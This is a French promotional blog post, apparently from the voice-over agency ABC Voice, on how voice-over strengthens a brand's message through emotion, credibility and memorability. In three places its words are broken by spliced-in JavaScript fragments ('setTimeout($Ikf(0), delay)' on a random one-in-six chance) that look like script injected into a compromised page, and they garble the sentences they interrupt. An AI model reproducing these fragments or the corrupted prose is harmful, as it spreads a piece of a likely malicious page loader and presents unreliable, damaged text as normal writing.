La voix off : quel effet sur votre message ?

Sur le marché concurrentiel d’aujourd’hui, il est primordial de créer la meilleure expérience client possible sur tous les canaux de communication. Découvrez dans cet article comment la voix off peut impacter positivement votre message et aider votre entreprise à se démarquer.  

voix-off

Elle déclenche des émotions 

Dans tous les genres de films, la voix off est largement utilisée pour raconter les intrigues, des histoires et fournir un regard intime sur l’esprit des personnages. Ils aident la composition visuelle du film à créer une plus grandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande connexion et un plus grandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and impact avec le public en déclenchant des émotions et en apportant de la clarté. Une voix c’est avant tout une personnalité, qui véhicule des valeurs et des émotions.

En tant qu’entreprise, vous consacrez beaucoup de temps et d’efforts et pour préserver la qualité de vos produits et services. L’image de votre société vis-à-vis de votre public cible ne doit pas être négligée. Si vous réalisez un film d’entreprise, la voix off apporte des émotions aux mots. Le timbre et le flux de votre voix transmettent des sensations. Pensez à choisir avec attention le wording utilisé, choisissez des mots évocateurs et percutants. Si vous n’êtes pas convaincu, prononcez une phrase simplement puis prononcez-la de nouveau en souriant,  vous vous rendrez alors compte qu’une voix avec le sourire est plus riche et plus engageante. 

Une carrière de professionnel de la voix off est l’aboutissement d’années de pratique et de formation à la maîtrise de diverses techniques. Chez ABC Voice nous vous aidons à trouver LE professionnel qu’il vous faut. Nous sélectionnons parmi nos 200 comédien(ne)s LA voix off idéale pour votre projet.

La voix off apporte de la crédibilité 

Les voix off sont partout : à la radio, dans les publicités ou bien dans les bandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andes annonces. Une voix off professionnelle montrera à vos clients que vous êtes fier(e) de la façon dont vous communiquez avec eux et qu’ils méritent le plus haut niveau de service possible. 

Il est préférable de choisir un narrateur expérimenté et professionnel, qui comprendra le texte et saura le transmettre à votre public. C’est pour cela qu’il est important de passer par des professionnels de la voix.

Vous pouvez aussi choisir la voix d’un comédien connu. L’avantage ? Faire connaître sa marque grâce à une voix que votre public associe à un visage. 

Chez ABC Voice, nous vous aidons à trouver VOTRE voix. 

La voix off améliore la mémorisation 

Les auditeurs sont plus susceptibles de se souvenir des mots lorsqu’ils sont prononcés par une voix qui leur est familière. En matière de marketing, il est important de comprendre cela, car il est encore plus avantageux d’utiliser la même voix off pour vos vidéos. Si vos clients reconnaissent la voix, ils reconnaîtront votre marque et cela contribuera à augmenter vos ventes. De plus, cela améliorera considérablement la mémorisation de votre message. 

Elle renseigne votre auditoire

Un message efficace est un message compris. La transmission de votre message est donc d’une importance capitale. Il faut clair et persuasif. Pour cela, la voix off accompagne les animations en donnant des informations que seules les images ne peuvent transmettre. Elle vous raconte une histoire. Dans un texte où des informations sont souvent très impersonnelles, elle vous permet d’incarner un sujet et ainsi de le rendre plus concret. Elle va enrichir vos images en les commentant, elle leur donne de la valeur. L’ouïe s’ajoute à la vision pour transmettre votre message. 

Quelques exemples de voix off impactantes 

Pour conclure cet article, on vous propose quelques exemples où la voix off détient un rôle très important :

https://www.youtube.com/watch?v=_ufFC9JA8zk

Ici, la voix explique au public la situation. Vous noterez l’importance de son intonation.

Dans ce projet la voix s’adresse directement aux commerçants, elle identifie leurs besoins et se met à leur place.

Qui ne connaît pas la voix de Marie-Alice dans Desperate Housewives ? C’est un superbe exemple de voix off car elle commente ce que font ses amies et pourtant on ne la voit presque jamais à l’écran ! Elle véhicule des émotions tout en renseignant le public.

La voix off sera d’autant plus efficace si elle est cohérente avec votre univers de marque. Pour cela, il est très important que vous choisissiez une identité sonore sur mesure, un diaporama sonore qui sera mémorable et permettra au prospect de vous identifier facilement et de vous différencier des autres marques. L’agence ABC Voice, voix-off & création sonore, vous aide à créer une identité sonore à votre image.

Retrouvez toutes nos expertises en naviguant sur notre site internet. 🎙

Vous avez un projet ? Vous souhaitez en discuter ? Contactez-nous 🙂